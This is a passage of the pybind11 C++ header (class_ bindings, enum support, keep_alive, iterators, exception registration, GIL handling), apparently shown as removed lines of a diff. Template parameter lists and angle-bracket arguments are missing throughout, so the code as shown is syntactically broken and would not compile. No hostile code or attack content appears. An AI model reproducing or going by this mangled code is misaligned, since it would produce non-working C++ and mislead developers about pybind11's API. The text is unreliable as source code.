(!type->ht_type.tp_as_buffer) - pybind11_fail( - "To be able to register buffer protocol support for the type '" + - std::string(tinfo->type->tp_name) + - "' the associated class<>(..) invocation must " - "include the pybind11::buffer_protocol() annotation!"); - - tinfo->get_buffer = get_buffer; - tinfo->get_buffer_data = get_buffer_data; - } - - // rec_func must be set for either fget or fset. - void def_property_static_impl(const char *name, - handle fget, handle fset, - detail::function_record *rec_func) { - const auto is_static = rec_func && !(rec_func->is_method && rec_func->scope); - const auto has_doc = rec_func && rec_func->doc && pybind11::options::show_user_defined_docstrings(); - auto property = handle((PyObject *) (is_static ? get_internals().static_property_type - : &PyProperty_Type)); - attr(name) = property(fget.ptr() ? fget : none(), - fset.ptr() ? fset : none(), - /*deleter*/none(), - pybind11::str(has_doc ? rec_func->doc : "")); - } -}; - -/// Set the pointer to operator new if it exists. The cast is needed because it can be overloaded. -template (T::operator new))>> -void set_operator_new(type_record *r) { r->operator_new = &T::operator new; } - -template void set_operator_new(...) { } - -template struct has_operator_delete : std::false_type { }; -template struct has_operator_delete(T::operator delete))>> - : std::true_type { }; -template struct has_operator_delete_size : std::false_type { }; -template struct has_operator_delete_size(T::operator delete))>> - : std::true_type { }; -/// Call class-specific delete if it exists or global otherwise. Can also be an overload set. -template ::value, int> = 0> -void call_operator_delete(T *p, size_t, size_t) { T::operator delete(p); } -template ::value && has_operator_delete_size::value, int> = 0> -void call_operator_delete(T *p, size_t s, size_t) { T::operator delete(p, s); } - -inline void call_operator_delete(void *p, size_t s, size_t a) { - (void)s; (void)a; - #if defined(__cpp_aligned_new) && (!defined(_MSC_VER) || _MSC_VER >= 1912) - if (a > __STDCPP_DEFAULT_NEW_ALIGNMENT__) { - #ifdef __cpp_sized_deallocation - ::operator delete(p, s, std::align_val_t(a)); - #else - ::operator delete(p, std::align_val_t(a)); - #endif - return; - } - #endif - #ifdef __cpp_sized_deallocation - ::operator delete(p, s); - #else - ::operator delete(p); - #endif -} - -inline void add_class_method(object& cls, const char *name_, const cpp_function &cf) { - cls.attr(cf.name()) = cf; - if (strcmp(name_, "__eq__") == 0 && !cls.attr("__dict__").contains("__hash__")) { - cls.attr("__hash__") = none(); - } -} - -PYBIND11_NAMESPACE_END(detail) - -/// Given a pointer to a member function, cast it to its `Derived` version. -/// Forward everything else unchanged. -template -auto method_adaptor(F &&f) -> decltype(std::forward(f)) { return std::forward(f); } - -template -auto method_adaptor(Return (Class::*pmf)(Args...)) -> Return (Derived::*)(Args...) { - static_assert(detail::is_accessible_base_of::value, - "Cannot bind an inaccessible base class method; use a lambda definition instead"); - return pmf; -} - -template -auto method_adaptor(Return (Class::*pmf)(Args...) const) -> Return (Derived::*)(Args...) const { - static_assert(detail::is_accessible_base_of::value, - "Cannot bind an inaccessible base class method; use a lambda definition instead"); - return pmf; -} - -template -class class_ : public detail::generic_type { - template using is_holder = detail::is_holder_type; - template using is_subtype = detail::is_strict_base_of; - template using is_base = detail::is_strict_base_of; - // struct instead of using here to help MSVC: - template struct is_valid_class_option : - detail::any_of, is_subtype, is_base> {}; - -public: - using type = type_; - using type_alias = detail::exactly_one_t; - constexpr static bool has_alias = !std::is_void::value; - using holder_type = detail::exactly_one_t, options...>; - - static_assert(detail::all_of...>::value, - "Unknown/invalid class_ template parameters provided"); - - static_assert(!has_alias || std::is_polymorphic::value, - "Cannot use an alias class with a non-polymorphic type"); - - PYBIND11_OBJECT(class_, generic_type, PyType_Check) - - template - class_(handle scope, const char *name, const Extra &... extra) { - using namespace detail; - - // MI can only be specified via class_ template options, not constructor parameters - static_assert( - none_of...>::value || // no base class arguments, or: - ( constexpr_sum(is_pyobject::value...) == 1 && // Exactly one base - constexpr_sum(is_base::value...) == 0 && // no template option bases - none_of...>::value), // no multiple_inheritance attr - "Error: multiple inheritance bases must be specified via class_ template options"); - - type_record record; - record.scope = scope; - record.name = name; - record.type = &typeid(type); - record.type_size = sizeof(conditional_t); - record.type_align = alignof(conditional_t&); - record.holder_size = sizeof(holder_type); - record.init_instance = init_instance; - record.dealloc = dealloc; - record.default_holder = detail::is_instantiation::value; - - set_operator_new(&record); - - /* Register base classes specified via template arguments to class_, if any */ - PYBIND11_EXPAND_SIDE_EFFECTS(add_base(record)); - - /* Process optional arguments, if any */ - process_attributes::init(extra..., &record); - - generic_type::initialize(record); - - if (has_alias) { - auto &instances = record.module_local ? registered_local_types_cpp() : get_internals().registered_types_cpp; - instances[std::type_index(typeid(type_alias))] = instances[std::type_index(typeid(type))]; - } - } - - template ::value, int> = 0> - static void add_base(detail::type_record &rec) { - rec.add_base(typeid(Base), [](void *src) -> void * { - return static_cast(reinterpret_cast(src)); - }); - } - - template ::value, int> = 0> - static void add_base(detail::type_record &) { } - - template - class_ &def(const char *name_, Func&& f, const Extra&... extra) { - cpp_function cf(method_adaptor(std::forward(f)), name(name_), is_method(*this), - sibling(getattr(*this, name_, none())), extra...); - add_class_method(*this, name_, cf); - return *this; - } - - template class_ & - def_static(const char *name_, Func &&f, const Extra&... extra) { - static_assert(!std::is_member_function_pointer::value, - "def_static(...) called with a non-static member function pointer"); - cpp_function cf(std::forward(f), name(name_), scope(*this), - sibling(getattr(*this, name_, none())), extra...); - attr(cf.name()) = staticmethod(cf); - return *this; - } - - template - class_ &def(const detail::op_ &op, const Extra&... extra) { - op.execute(*this, extra...); - return *this; - } - - template - class_ & def_cast(const detail::op_ &op, const Extra&... extra) { - op.execute_cast(*this, extra...); - return *this; - } - - template - class_ &def(const detail::initimpl::constructor &init, const Extra&... extra) { - init.execute(*this, extra...); - return *this; - } - - template - class_ &def(const detail::initimpl::alias_constructor &init, const Extra&... extra) { - init.execute(*this, extra...); - return *this; - } - - template - class_ &def(detail::initimpl::factory &&init, const Extra&... extra) { - std::move(init).execute(*this, extra...); - return *this; - } - - template - class_ &def(detail::initimpl::pickle_factory &&pf, const Extra &...extra) { - std::move(pf).execute(*this, extra...); - return *this; - } - - template class_& def_buffer(Func &&func) { - struct capture { Func func; }; - capture *ptr = new capture { std::forward(func) }; - install_buffer_funcs([](PyObject *obj, void *ptr) -> buffer_info* { - detail::make_caster caster; - if (!caster.load(obj, false)) - return nullptr; - return new buffer_info(((capture *) ptr)->func(caster)); - }, ptr); - return *this; - } - - template - class_ &def_buffer(Return (Class::*func)(Args...)) { - return def_buffer([func] (type &obj) { return (obj.*func)(); }); - } - - template - class_ &def_buffer(Return (Class::*func)(Args...) const) { - return def_buffer([func] (const type &obj) { return (obj.*func)(); }); - } - - template - class_ &def_readwrite(const char *name, D C::*pm, const Extra&... extra) { - static_assert(std::is_same::value || std::is_base_of::value, "def_readwrite() requires a class member (or base class member)"); - cpp_function fget([pm](const type &c) -> const D &{ return c.*pm; }, is_method(*this)), - fset([pm](type &c, const D &value) { c.*pm = value; }, is_method(*this)); - def_property(name, fget, fset, return_value_policy::reference_internal, extra...); - return *this; - } - - template - class_ &def_readonly(const char *name, const D C::*pm, const Extra& ...extra) { - static_assert(std::is_same::value || std::is_base_of::value, "def_readonly() requires a class member (or base class member)"); - cpp_function fget([pm](const type &c) -> const D &{ return c.*pm; }, is_method(*this)); - def_property_readonly(name, fget, return_value_policy::reference_internal, extra...); - return *this; - } - - template - class_ &def_readwrite_static(const char *name, D *pm, const Extra& ...extra) { - cpp_function fget([pm](object) -> const D &{ return *pm; }, scope(*this)), - fset([pm](object, const D &value) { *pm = value; }, scope(*this)); - def_property_static(name, fget, fset, return_value_policy::reference, extra...); - return *this; - } - - template - class_ &def_readonly_static(const char *name, const D *pm, const Extra& ...extra) { - cpp_function fget([pm](object) -> const D &{ return *pm; }, scope(*this)); - def_property_readonly_static(name, fget, return_value_policy::reference, extra...); - return *this; - } - - /// Uses return_value_policy::reference_internal by default - template - class_ &def_property_readonly(const char *name, const Getter &fget, const Extra& ...extra) { - return def_property_readonly(name, cpp_function(method_adaptor(fget)), - return_value_policy::reference_internal, extra...); - } - - /// Uses cpp_function's return_value_policy by default - template - class_ &def_property_readonly(const char *name, const cpp_function &fget, const Extra& ...extra) { - return def_property(name, fget, nullptr, extra...); - } - - /// Uses return_value_policy::reference by default - template - class_ &def_property_readonly_static(const char *name, const Getter &fget, const Extra& ...extra) { - return def_property_readonly_static(name, cpp_function(fget), return_value_policy::reference, extra...); - } - - /// Uses cpp_function's return_value_policy by default - template - class_ &def_property_readonly_static(const char *name, const cpp_function &fget, const Extra& ...extra) { - return def_property_static(name, fget, nullptr, extra...); - } - - /// Uses return_value_policy::reference_internal by default - template - class_ &def_property(const char *name, const Getter &fget, const Setter &fset, const Extra& ...extra) { - return def_property(name, fget, cpp_function(method_adaptor(fset)), extra...); - } - template - class_ &def_property(const char *name, const Getter &fget, const cpp_function &fset, const Extra& ...extra) { - return def_property(name, cpp_function(method_adaptor(fget)), fset, - return_value_policy::reference_internal, extra...); - } - - /// Uses cpp_function's return_value_policy by default - template - class_ &def_property(const char *name, const cpp_function &fget, const cpp_function &fset, const Extra& ...extra) { - return def_property_static(name, fget, fset, is_method(*this), extra...); - } - - /// Uses return_value_policy::reference by default - template - class_ &def_property_static(const char *name, const Getter &fget, const cpp_function &fset, const Extra& ...extra) { - return def_property_static(name, cpp_function(fget), fset, return_value_policy::reference, extra...); - } - - /// Uses cpp_function's return_value_policy by default - template - class_ &def_property_static(const char *name, const cpp_function &fget, const cpp_function &fset, const Extra& ...extra) { - static_assert( 0 == detail::constexpr_sum(std::is_base_of::value...), - "Argument annotations are not allowed for properties"); - auto rec_fget = get_function_record(fget), rec_fset = get_function_record(fset); - auto *rec_active = rec_fget; - if (rec_fget) { - char *doc_prev = rec_fget->doc; /* 'extra' field may include a property-specific documentation string */ - detail::process_attributes::init(extra..., rec_fget); - if (rec_fget->doc && rec_fget->doc != doc_prev) { - free(doc_prev); - rec_fget->doc = strdup(rec_fget->doc); - } - } - if (rec_fset) { - char *doc_prev = rec_fset->doc; - detail::process_attributes::init(extra..., rec_fset); - if (rec_fset->doc && rec_fset->doc != doc_prev) { - free(doc_prev); - rec_fset->doc = strdup(rec_fset->doc); - } - if (! rec_active) rec_active = rec_fset; - } - def_property_static_impl(name, fget, fset, rec_active); - return *this; - } - -private: - /// Initialize holder object, variant 1: object derives from enable_shared_from_this - template - static void init_holder(detail::instance *inst, detail::value_and_holder &v_h, - const holder_type * /* unused */, const std::enable_shared_from_this * /* dummy */) { - try { - auto sh = std::dynamic_pointer_cast( - v_h.value_ptr()->shared_from_this()); - if (sh) { - new (std::addressof(v_h.holder())) holder_type(std::move(sh)); - v_h.set_holder_constructed(); - } - } catch (const std::bad_weak_ptr &) {} - - if (!v_h.holder_constructed() && inst->owned) { - new (std::addressof(v_h.holder())) holder_type(v_h.value_ptr()); - v_h.set_holder_constructed(); - } - } - - static void init_holder_from_existing(const detail::value_and_holder &v_h, - const holder_type *holder_ptr, std::true_type /*is_copy_constructible*/) { - new (std::addressof(v_h.holder())) holder_type(*reinterpret_cast(holder_ptr)); - } - - static void init_holder_from_existing(const detail::value_and_holder &v_h, - const holder_type *holder_ptr, std::false_type /*is_copy_constructible*/) { - new (std::addressof(v_h.holder())) holder_type(std::move(*const_cast(holder_ptr))); - } - - /// Initialize holder object, variant 2: try to construct from existing holder object, if possible - static void init_holder(detail::instance *inst, detail::value_and_holder &v_h, - const holder_type *holder_ptr, const void * /* dummy -- not enable_shared_from_this) */) { - if (holder_ptr) { - init_holder_from_existing(v_h, holder_ptr, std::is_copy_constructible()); - v_h.set_holder_constructed(); - } else if (inst->owned || detail::always_construct_holder::value) { - new (std::addressof(v_h.holder())) holder_type(v_h.value_ptr()); - v_h.set_holder_constructed(); - } - } - - /// Performs instance initialization including constructing a holder and registering the known - /// instance. Should be called as soon as the `type` value_ptr is set for an instance. Takes an - /// optional pointer to an existing holder to use; if not specified and the instance is - /// `.owned`, a new holder will be constructed to manage the value pointer. - static void init_instance(detail::instance *inst, const void *holder_ptr) { - auto v_h = inst->get_value_and_holder(detail::get_type_info(typeid(type))); - if (!v_h.instance_registered()) { - register_instance(inst, v_h.value_ptr(), v_h.type); - v_h.set_instance_registered(); - } - init_holder(inst, v_h, (const holder_type *) holder_ptr, v_h.value_ptr()); - } - - /// Deallocates an instance; via holder, if constructed; otherwise via operator delete. - static void dealloc(detail::value_and_holder &v_h) { - // We could be deallocating because we are cleaning up after a Python exception. - // If so, the Python error indicator will be set. We need to clear that before - // running the destructor, in case the destructor code calls more Python. - // If we don't, the Python API will exit with an exception, and pybind11 will - // throw error_already_set from the C++ destructor which is forbidden and triggers - // std::terminate(). - error_scope scope; - if (v_h.holder_constructed()) { - v_h.holder().~holder_type(); - v_h.set_holder_constructed(false); - } - else { - detail::call_operator_delete(v_h.value_ptr(), - v_h.type->type_size, - v_h.type->type_align - ); - } - v_h.value_ptr() = nullptr; - } - - static detail::function_record *get_function_record(handle h) { - h = detail::get_function(h); - return h ? (detail::function_record *) reinterpret_borrow(PyCFunction_GET_SELF(h.ptr())) - : nullptr; - } -}; - -/// Binds an existing constructor taking arguments Args... -template detail::initimpl::constructor init() { return {}; } -/// Like `init()`, but the instance is always constructed through the alias class (even -/// when not inheriting on the Python side). -template detail::initimpl::alias_constructor init_alias() { return {}; } - -/// Binds a factory function as a constructor -template > -Ret init(Func &&f) { return {std::forward(f)}; } - -/// Dual-argument factory function: the first function is called when no alias is needed, the second -/// when an alias is needed (i.e. due to python-side inheritance). Arguments must be identical. -template > -Ret init(CFunc &&c, AFunc &&a) { - return {std::forward(c), std::forward(a)}; -} - -/// Binds pickling functions `__getstate__` and `__setstate__` and ensures that the type -/// returned by `__getstate__` is the same as the argument accepted by `__setstate__`. -template -detail::initimpl::pickle_factory pickle(GetState &&g, SetState &&s) { - return {std::forward(g), std::forward(s)}; -} - -PYBIND11_NAMESPACE_BEGIN(detail) -struct enum_base { - enum_base(handle base, handle parent) : m_base(base), m_parent(parent) { } - - PYBIND11_NOINLINE void init(bool is_arithmetic, bool is_convertible) { - m_base.attr("__entries") = dict(); - auto property = handle((PyObject *) &PyProperty_Type); - auto static_property = handle((PyObject *) get_internals().static_property_type); - - m_base.attr("__repr__") = cpp_function( - [](handle arg) -> str { - handle type = arg.get_type(); - object type_name = type.attr("__name__"); - dict entries = type.attr("__entries"); - for (const auto &kv : entries) { - object other = kv.second[int_(0)]; - if (other.equal(arg)) - return pybind11::str("{}.{}").format(type_name, kv.first); - } - return pybind11::str("{}.???").format(type_name); - }, name("__repr__"), is_method(m_base) - ); - - m_base.attr("name") = property(cpp_function( - [](handle arg) -> str { - dict entries = arg.get_type().attr("__entries"); - for (const auto &kv : entries) { - if (handle(kv.second[int_(0)]).equal(arg)) - return pybind11::str(kv.first); - } - return "???"; - }, name("name"), is_method(m_base) - )); - - m_base.attr("__doc__") = static_property(cpp_function( - [](handle arg) -> std::string { - std::string docstring; - dict entries = arg.attr("__entries"); - if (((PyTypeObject *) arg.ptr())->tp_doc) - docstring += std::string(((PyTypeObject *) arg.ptr())->tp_doc) + "\n\n"; - docstring += "Members:"; - for (const auto &kv : entries) { - auto key = std::string(pybind11::str(kv.first)); - auto comment = kv.second[int_(1)]; - docstring += "\n\n " + key; - if (!comment.is_none()) - docstring += " : " + (std::string) pybind11::str(comment); - } - return docstring; - }, name("__doc__") - ), none(), none(), ""); - - m_base.attr("__members__") = static_property(cpp_function( - [](handle arg) -> dict { - dict entries = arg.attr("__entries"), m; - for (const auto &kv : entries) - m[kv.first] = kv.second[int_(0)]; - return m; - }, name("__members__")), none(), none(), "" - ); - - #define PYBIND11_ENUM_OP_STRICT(op, expr, strict_behavior) \ - m_base.attr(op) = cpp_function( \ - [](object a, object b) { \ - if (!a.get_type().is(b.get_type())) \ - strict_behavior; \ - return expr; \ - }, \ - name(op), is_method(m_base)) - - #define PYBIND11_ENUM_OP_CONV(op, expr) \ - m_base.attr(op) = cpp_function( \ - [](object a_, object b_) { \ - int_ a(a_), b(b_); \ - return expr; \ - }, \ - name(op), is_method(m_base)) - - #define PYBIND11_ENUM_OP_CONV_LHS(op, expr) \ - m_base.attr(op) = cpp_function( \ - [](object a_, object b) { \ - int_ a(a_); \ - return expr; \ - }, \ - name(op), is_method(m_base)) - - if (is_convertible) { - PYBIND11_ENUM_OP_CONV_LHS("__eq__", !b.is_none() && a.equal(b)); - PYBIND11_ENUM_OP_CONV_LHS("__ne__", b.is_none() || !a.equal(b)); - - if (is_arithmetic) { - PYBIND11_ENUM_OP_CONV("__lt__", a < b); - PYBIND11_ENUM_OP_CONV("__gt__", a > b); - PYBIND11_ENUM_OP_CONV("__le__", a <= b); - PYBIND11_ENUM_OP_CONV("__ge__", a >= b); - PYBIND11_ENUM_OP_CONV("__and__", a & b); - PYBIND11_ENUM_OP_CONV("__rand__", a & b); - PYBIND11_ENUM_OP_CONV("__or__", a | b); - PYBIND11_ENUM_OP_CONV("__ror__", a | b); - PYBIND11_ENUM_OP_CONV("__xor__", a ^ b); - PYBIND11_ENUM_OP_CONV("__rxor__", a ^ b); - m_base.attr("__invert__") = cpp_function( - [](object arg) { return ~(int_(arg)); }, name("__invert__"), is_method(m_base)); - } - } else { - PYBIND11_ENUM_OP_STRICT("__eq__", int_(a).equal(int_(b)), return false); - PYBIND11_ENUM_OP_STRICT("__ne__", !int_(a).equal(int_(b)), return true); - - if (is_arithmetic) { - #define PYBIND11_THROW throw type_error("Expected an enumeration of matching type!"); - PYBIND11_ENUM_OP_STRICT("__lt__", int_(a) < int_(b), PYBIND11_THROW); - PYBIND11_ENUM_OP_STRICT("__gt__", int_(a) > int_(b), PYBIND11_THROW); - PYBIND11_ENUM_OP_STRICT("__le__", int_(a) <= int_(b), PYBIND11_THROW); - PYBIND11_ENUM_OP_STRICT("__ge__", int_(a) >= int_(b), PYBIND11_THROW); - #undef PYBIND11_THROW - } - } - - #undef PYBIND11_ENUM_OP_CONV_LHS - #undef PYBIND11_ENUM_OP_CONV - #undef PYBIND11_ENUM_OP_STRICT - - m_base.attr("__getstate__") = cpp_function( - [](object arg) { return int_(arg); }, name("__getstate__"), is_method(m_base)); - - m_base.attr("__hash__") = cpp_function( - [](object arg) { return int_(arg); }, name("__hash__"), is_method(m_base)); - } - - PYBIND11_NOINLINE void value(char const* name_, object value, const char *doc = nullptr) { - dict entries = m_base.attr("__entries"); - str name(name_); - if (entries.contains(name)) { - std::string type_name = (std::string) str(m_base.attr("__name__")); - throw value_error(type_name + ": element \"" + std::string(name_) + "\" already exists!"); - } - - entries[name] = std::make_pair(value, doc); - m_base.attr(name) = value; - } - - PYBIND11_NOINLINE void export_values() { - dict entries = m_base.attr("__entries"); - for (const auto &kv : entries) - m_parent.attr(kv.first) = kv.second[int_(0)]; - } - - handle m_base; - handle m_parent; -}; - -PYBIND11_NAMESPACE_END(detail) - -/// Binds C++ enumerations and enumeration classes to Python -template class enum_ : public class_ { -public: - using Base = class_; - using Base::def; - using Base::attr; - using Base::def_property_readonly; - using Base::def_property_readonly_static; - using Scalar = typename std::underlying_type::type; - - template - enum_(const handle &scope, const char *name, const Extra&... extra) - : class_(scope, name, extra...), m_base(*this, scope) { - constexpr bool is_arithmetic = detail::any_of...>::value; - constexpr bool is_convertible = std::is_convertible::value; - m_base.init(is_arithmetic, is_convertible); - - def(init([](Scalar i) { return static_cast(i); })); - def("__int__", [](Type value) { return (Scalar) value; }); - #if PY_MAJOR_VERSION < 3 - def("__long__", [](Type value) { return (Scalar) value; }); - #endif - #if PY_MAJOR_VERSION > 3 || (PY_MAJOR_VERSION == 3 && PY_MINOR_VERSION >= 8) - def("__index__", [](Type value) { return (Scalar) value; }); - #endif - - attr("__setstate__") = cpp_function( - [](detail::value_and_holder &v_h, Scalar arg) { - detail::initimpl::setstate(v_h, static_cast(arg), - Py_TYPE(v_h.inst) != v_h.type->type); }, - detail::is_new_style_constructor(), - pybind11::name("__setstate__"), is_method(*this)); - } - - /// Export enumeration entries into the parent scope - enum_& export_values() { - m_base.export_values(); - return *this; - } - - /// Add an enumeration entry - enum_& value(char const* name, Type value, const char *doc = nullptr) { - m_base.value(name, pybind11::cast(value, return_value_policy::copy), doc); - return *this; - } - -private: - detail::enum_base m_base; -}; - -PYBIND11_NAMESPACE_BEGIN(detail) - - -inline void keep_alive_impl(handle nurse, handle patient) { - if (!nurse || !patient) - pybind11_fail("Could not activate keep_alive!"); - - if (patient.is_none() || nurse.is_none()) - return; /* Nothing to keep alive or nothing to be kept alive by */ - - auto tinfo = all_type_info(Py_TYPE(nurse.ptr())); - if (!tinfo.empty()) { - /* It's a pybind-registered type, so we can store the patient in the - * internal list. */ - add_patient(nurse.ptr(), patient.ptr()); - } - else { - /* Fall back to clever approach based on weak references taken from - * Boost.Python. This is not used for pybind-registered types because - * the objects can be destroyed out-of-order in a GC pass. */ - cpp_function disable_lifesupport( - [patient](handle weakref) { patient.dec_ref(); weakref.dec_ref(); }); - - weakref wr(nurse, disable_lifesupport); - - patient.inc_ref(); /* reference patient and leak the weak reference */ - (void) wr.release(); - } -} - -PYBIND11_NOINLINE inline void keep_alive_impl(size_t Nurse, size_t Patient, function_call &call, handle ret) { - auto get_arg = [&](size_t n) { - if (n == 0) - return ret; - else if (n == 1 && call.init_self) - return call.init_self; - else if (n <= call.args.size()) - return call.args[n - 1]; - return handle(); - }; - - keep_alive_impl(get_arg(Nurse), get_arg(Patient)); -} - -inline std::pair all_type_info_get_cache(PyTypeObject *type) { - auto res = get_internals().registered_types_py -#ifdef __cpp_lib_unordered_map_try_emplace - .try_emplace(type); -#else - .emplace(type, std::vector()); -#endif - if (res.second) { - // New cache entry created; set up a weak reference to automatically remove it if the type - // gets destroyed: - weakref((PyObject *) type, cpp_function([type](handle wr) { - get_internals().registered_types_py.erase(type); - wr.dec_ref(); - })).release(); - } - - return res; -} - -template -struct iterator_state { - Iterator it; - Sentinel end; - bool first_or_done; -}; - -PYBIND11_NAMESPACE_END(detail) - -/// Makes a python iterator from a first and past-the-end C++ InputIterator. -template ()), - typename... Extra> -iterator make_iterator(Iterator first, Sentinel last, Extra &&... extra) { - typedef detail::iterator_state state; - - if (!detail::get_type_info(typeid(state), false)) { - class_(handle(), "iterator", pybind11::module_local()) - .def("__iter__", [](state &s) -> state& { return s; }) - .def("__next__", [](state &s) -> ValueType { - if (!s.first_or_done) - ++s.it; - else - s.first_or_done = false; - if (s.it == s.end) { - s.first_or_done = true; - throw stop_iteration(); - } - return *s.it; - }, std::forward(extra)..., Policy); - } - - return cast(state{first, last, true}); -} - -/// Makes an python iterator over the keys (`.first`) of a iterator over pairs from a -/// first and past-the-end InputIterator. -template ()).first), - typename... Extra> -iterator make_key_iterator(Iterator first, Sentinel last, Extra &&... extra) { - typedef detail::iterator_state state; - - if (!detail::get_type_info(typeid(state), false)) { - class_(handle(), "iterator", pybind11::module_local()) - .def("__iter__", [](state &s) -> state& { return s; }) - .def("__next__", [](state &s) -> KeyType { - if (!s.first_or_done) - ++s.it; - else - s.first_or_done = false; - if (s.it == s.end) { - s.first_or_done = true; - throw stop_iteration(); - } - return (*s.it).first; - }, std::forward(extra)..., Policy); - } - - return cast(state{first, last, true}); -} - -/// Makes an iterator over values of an stl container or other container supporting -/// `std::begin()`/`std::end()` -template iterator make_iterator(Type &value, Extra&&... extra) { - return make_iterator(std::begin(value), std::end(value), extra...); -} - -/// Makes an iterator over the keys (`.first`) of a stl map-like container supporting -/// `std::begin()`/`std::end()` -template iterator make_key_iterator(Type &value, Extra&&... extra) { - return make_key_iterator(std::begin(value), std::end(value), extra...); -} - -template void implicitly_convertible() { - struct set_flag { - bool &flag; - set_flag(bool &flag) : flag(flag) { flag = true; } - ~set_flag() { flag = false; } - }; - auto implicit_caster = [](PyObject *obj, PyTypeObject *type) -> PyObject * { - static bool currently_used = false; - if (currently_used) // implicit conversions are non-reentrant - return nullptr; - set_flag flag_helper(currently_used); - if (!detail::make_caster().load(obj, false)) - return nullptr; - tuple args(1); - args[0] = obj; - PyObject *result = PyObject_Call((PyObject *) type, args.ptr(), nullptr); - if (result == nullptr) - PyErr_Clear(); - return result; - }; - - if (auto tinfo = detail::get_type_info(typeid(OutputType))) - tinfo->implicit_conversions.push_back(implicit_caster); - else - pybind11_fail("implicitly_convertible: Unable to find type " + type_id()); -} - -template -void register_exception_translator(ExceptionTranslator&& translator) { - detail::get_internals().registered_exception_translators.push_front( - std::forward(translator)); -} - -/** - * Wrapper to generate a new Python exception type. - * - * This should only be used with PyErr_SetString for now. - * It is not (yet) possible to use as a py::base. - * Template type argument is reserved for future use. - */ -template -class exception : public object { -public: - exception() = default; - exception(handle scope, const char *name, PyObject *base = PyExc_Exception) { - std::string full_name = scope.attr("__name__").cast() + - std::string(".") + name; - m_ptr = PyErr_NewException(const_cast(full_name.c_str()), base, NULL); - if (hasattr(scope, name)) - pybind11_fail("Error during initialization: multiple incompatible " - "definitions with name \"" + std::string(name) + "\""); - scope.attr(name) = *this; - } - - // Sets the current python exception to this exception object with the given message - void operator()(const char *message) { - PyErr_SetString(m_ptr, message); - } -}; - -PYBIND11_NAMESPACE_BEGIN(detail) -// Returns a reference to a function-local static exception object used in the simple -// register_exception approach below. (It would be simpler to have the static local variable -// directly in register_exception, but that makes clang <3.5 segfault - issue #1349). -template -exception &get_exception_object() { static exception ex; return ex; } -PYBIND11_NAMESPACE_END(detail) - -/** - * Registers a Python exception in `m` of the given `name` and installs an exception translator to - * translate the C++ exception to the created Python exception using the exceptions what() method. - * This is intended for simple exception translations; for more complex translation, register the - * exception object and translator directly. - */ -template -exception ®ister_exception(handle scope, - const char *name, - PyObject *base = PyExc_Exception) { - auto &ex = detail::get_exception_object(); - if (!ex) ex = exception(scope, name, base); - - register_exception_translator([](std::exception_ptr p) { - if (!p) return; - try { - std::rethrow_exception(p); - } catch (const CppException &e) { - detail::get_exception_object()(e.what()); - } - }); - return ex; -} - -PYBIND11_NAMESPACE_BEGIN(detail) -PYBIND11_NOINLINE inline void print(tuple args, dict kwargs) { - auto strings = tuple(args.size()); - for (size_t i = 0; i < args.size(); ++i) { - strings[i] = str(args[i]); - } - auto sep = kwargs.contains("sep") ? kwargs["sep"] : cast(" "); - auto line = sep.attr("join")(strings); - - object file; - if (kwargs.contains("file")) { - file = kwargs["file"].cast(); - } else { - try { - file = module::import("sys").attr("stdout"); - } catch (const error_already_set &) { - /* If print() is called from code that is executed as - part of garbage collection during interpreter shutdown, - importing 'sys' can fail. Give up rather than crashing the - interpreter in this case. */ - return; - } - } - - auto write = file.attr("write"); - write(line); - write(kwargs.contains("end") ? kwargs["end"] : cast("\n")); - - if (kwargs.contains("flush") && kwargs["flush"].cast()) - file.attr("flush")(); -} -PYBIND11_NAMESPACE_END(detail) - -template -void print(Args &&...args) { - auto c = detail::collect_arguments(std::forward(args)...); - detail::print(c.args(), c.kwargs()); -} - -#if defined(WITH_THREAD) && !defined(PYPY_VERSION) - -/* The functions below essentially reproduce the PyGILState_* API using a RAII - * pattern, but there are a few important differences: - * - * 1. When acquiring the GIL from an non-main thread during the finalization - * phase, the GILState API blindly terminates the calling thread, which - * is often not what is wanted. This API does not do this. - * - * 2. The gil_scoped_release function can optionally cut the relationship - * of a PyThreadState and its associated thread, which allows moving it to - * another thread (this is a fairly rare/advanced use case). - * - * 3. The reference count of an acquired thread state can be controlled. This - * can be handy to prevent cases where callbacks issued from an external - * thread would otherwise constantly construct and destroy thread state data - * structures. - * - * See the Python bindings of NanoGUI (http://github.com/wjakob/nanogui) for an - * example which uses features 2 and 3 to migrate the Python thread of - * execution to another thread (to run the event loop on the original thread, - * in this case). - */ - -class gil_scoped_acquire { -public: - PYBIND11_NOINLINE gil_scoped_acquire() { - auto const &internals = detail::get_internals(); - tstate = (PyThreadState *) PYBIND11_TLS_GET_VALUE(internals.tstate); - - if (!tstate) { - /* Check if the GIL was acquired using the PyGILState_* API instead (e.g. if - calling from a Python thread). Since we use a different key, this ensures - we don't create a new thread state and deadlock in PyEval_AcquireThread - below. Note we don't save this state with internals.tstate, since we don't - create it we would fail to clear it (its reference count should be > 0). */ - tstate = PyGILState_GetThisThreadState(); - } - - if (!tstate) { - tstate = PyThreadState_New(internals.istate); - #if !defined(NDEBUG) - if (!tstate) - pybind11_fail("scoped_acquire: could not create thread state!"); - #endif - tstate->gilstate_counter = 0; - PYBIND11_TLS_REPLACE_VALUE(internals.tstate, tstate); - } else { - release = detail::get_thread_state_unchecked() != tstate; - } - - if (release) { - /* Work around an annoying assertion in PyThreadState_Swap */ - #if defined(Py_DEBUG) - PyInterpreterState *interp = tstate->interp; - tstate->interp = nullptr; - #endif - PyEval_AcquireThread(tstate); - #if defined(Py_DEBUG) - tstate->interp = interp; - #endif - } - - inc_ref(); - } - - void inc_ref() { - ++tstate->gilstate_counter; - } - - PYBIND11_NOINLINE void dec_ref() { - --tstate->gilstate_counter; - #if !defined(NDEBUG) - if (detail::get_thread_state_unchecked() != tstate) - pybind11_fail("scoped_acquire::dec_ref(): thread state must be current!"); - if (tstate->gilstate_counter < 0) - pybind11_fail("scoped_acquire::dec_ref(): reference count underflow!"); - #endif - if (tstate->gilstate_counter == 0) { - #if !defined(NDEBUG) - if (!release) - pybind11_fail("scoped_acquire::dec_ref(): internal error!"); - #endif - PyThreadState_Clear(tstate); - PyThreadState_DeleteCurrent(); - PYBIND11_TLS_DELETE_VALUE(detail::get_internals().tstate); - release = false; - } - } - - PYBIND11_NOINLINE ~gil_scoped_acquire() { - dec_ref(); - if (release) - PyEval_SaveThread(); - } -private: - PyThreadState *tstate = nullptr; - bool release = true; -}; - -class gil_scoped_release { -public: - explicit gil_scoped_release(bool disassoc = false) : disassoc(disassoc) { - // `get_internals()` must be called here unconditionally in order to initialize - // `internals.tstate` for subsequent `gil_scoped_acquire` calls. Otherwise, an - // initialization race could occur as multiple threads try `gil_scoped_acquire`. - const auto &internals = detail::get_internals(); - 